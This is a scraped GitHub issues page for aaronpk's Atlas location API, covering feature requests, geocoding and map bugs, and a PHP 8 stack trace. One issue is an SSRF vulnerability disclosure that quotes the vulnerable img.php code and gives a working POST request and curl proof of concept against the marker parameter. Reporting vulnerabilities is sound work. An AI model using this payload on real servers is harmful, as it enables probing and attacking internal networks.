aaronpk / atlas Goto Github PK
View Code? Open in Web Editor NEW๐ Atlas is a set of APIs for looking up information about locations
License: Apache License 2.0
๐ Atlas is a set of APIs for looking up information about locations
License: Apache License 2.0
To allow for external attribution image to be passed through, as you currently allow a marker image URL to be passed through.
As we discussed:
Living close to the border, Atlas gives the wrong address for my home location. It seems to be a problem with the &distance=10000
parameter on the API call to geocode.arcgis.com.
This was originally used to get a location in area's where there was no address found, extending the search area by 10km.
The solution would be to first make a request without the parameter, and only if it returns empty, fetch with the 10km distance param.
You can check the API-calls with coordinates for my home address in this private post, if you need testing.
Publish a zip file including the vendor
folder containing dependencies so you can unzip it and run it without needing to use composer.
I'd like a feature where I submit a date and local time (without a timezone) and get, if possible, the timezone for this time and/or a fully tz-aware timestamp.
This is a bit ugly since it has edge cases: timestamps can either not be valid or ambigious, e.g. when they fall in a DST switch. For me, erroring out would be acceptable behavior in both cases.
Right now the map is always drawn with -180 on the left. When a line spans for example Tokyo to LA, the line is drawn the wrong way instead of crossing the -180 line.
Adding a couple lines similar to curl_setopt($chs[$x][$y], CURLOPT_FOLLOWLOCATION, true);
in just the right places seems to do the trick.
Found out after I got a server error. There's actually a comment in the code that reads // In case any of the tiles fail, they will be grey instead of throwing an error
: this is not quite true; in this case, the response is non-empty (it is a 301 error/redirect page), causing imagecreatefromstring()
to run but return false
. This in turns leads to a fatal error when imagesx($tile)
gets called: imagesx(): Argument aaronpk/Static-Maps-API-PHP#1 ($image) must be of type GdImage, bool given
.
Not sure if this library is still maintained, just thought I'd leave this here anyhow.
with URL parameters like lat/lng to be able to quickly create a URL that loads a map pin at a certain location
given a lat/lng, return information about the current weather at that location:
Use weather icons from https://erikflowers.github.io/weather-icons/
Weather data from wunderground
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: latest
Test with PHP 7.2
The vulnerable code is located in the curl_init
function of the img.php
file, which does not sufficiently validate the marker parameter, leading to a taint introduced from the $markersTemp
variable in the img.php
file and eventually into the tainted function curl_init
, where the curl_exec
function After execution, a request is sent to the URL specified by the marker parameter, eventually leading to an SSRF vulnerability.
......
if($markersTemp=request('marker')) {
if(!is_array($markersTemp))
$markersTemp = array($markersTemp);
......
if(preg_match('/https?:\/\/(.+)/', $properties['icon'], $match)) {
// Looks like an external image, attempt to download it
$ch = curl_init($properties['icon']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$img = curl_exec($ch);
......
Because the marker
parameter is unrestricted, it is also possible to use the server-side to send requests, such as probing intranet web services. The corresponding PoC is as follows
POST /img.php HTTP/1.1
Host: 172.16.119.1:81
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: close
marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123
You can also use the following curl command to verify the vulnerability
curl -i -s -k -X $'POST' \
-H $'Host: 172.16.119.1:81' -H $'Content-Length: 61' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
--data-binary $'marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123' \
$'http://172.16.119.1:81/img.php'
Possibly an issue with Savant3 dependency not being compatible with PHP 8. Running the application produces this error:
Fatal error: Uncaught ValueError: func_get_arg(): Argument #1 ($position) must be less than the number of the arguments passed to the currently executed function in
/app/vendor/saltybeagle/savant3/Savant3.php:901
Stack trace:
#0 /app/vendor/saltybeagle/savant3/Savant3.php(901): func_get_arg(1)
#1 /app/vendor/p3k/slim-savant/Savant.php(74): Savant3->assign(Array)
#2 /app/vendor/slim/slim/Slim/View.php(255): Slim\Extras\Views\Savant->render('layout.php', Array)
#3 /app/vendor/slim/slim/Slim/View.php(243): Slim\View->fetch('layout.php', NULL)
#4 /app/vendor/slim/slim/Slim/Slim.php(755): Slim\View->display('layout.php')
#5 /app/vendor/p3k/slim-savant/SlimSavant.php(19): Slim\Slim->render('layout.php', Array)
#6 /app/controllers/main.php(5): Slim\Savant\render('index')
#7 [internal function]: {closure}()
#8 /app/vendor/slim/slim/Slim/Route.php(468): call_user_func_array(Object(Closure), Array)
#9 /app/vendor/slim/slim/Slim/Slim.php(1355): Slim\Route->dispatch()
#10 /app/vendor/slim/slim/Slim/Middleware/Flash.php(85): Slim\Slim->call()
#11 /app/vendor/slim/slim/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call()
#12 /app/vendor/slim/slim/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
#13 /app/vendor/slim/slim/Slim/Slim.php(1300): Slim\Middleware\PrettyExceptions->call()
#14 /app/public/index.php(12): Slim\Slim->run()
#15 {main} thrown in /app/vendor/saltybeagle/savant3/Savant3.php on line 901
There may be other such incompatibility issues lurking in dependencies or in the apps own code.
PHP 7.x is no longer maintained and has reached end of life. One way this manifests itself is that versions below v8 are disabled in Brew, and not supported by tools like Nixpicks.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.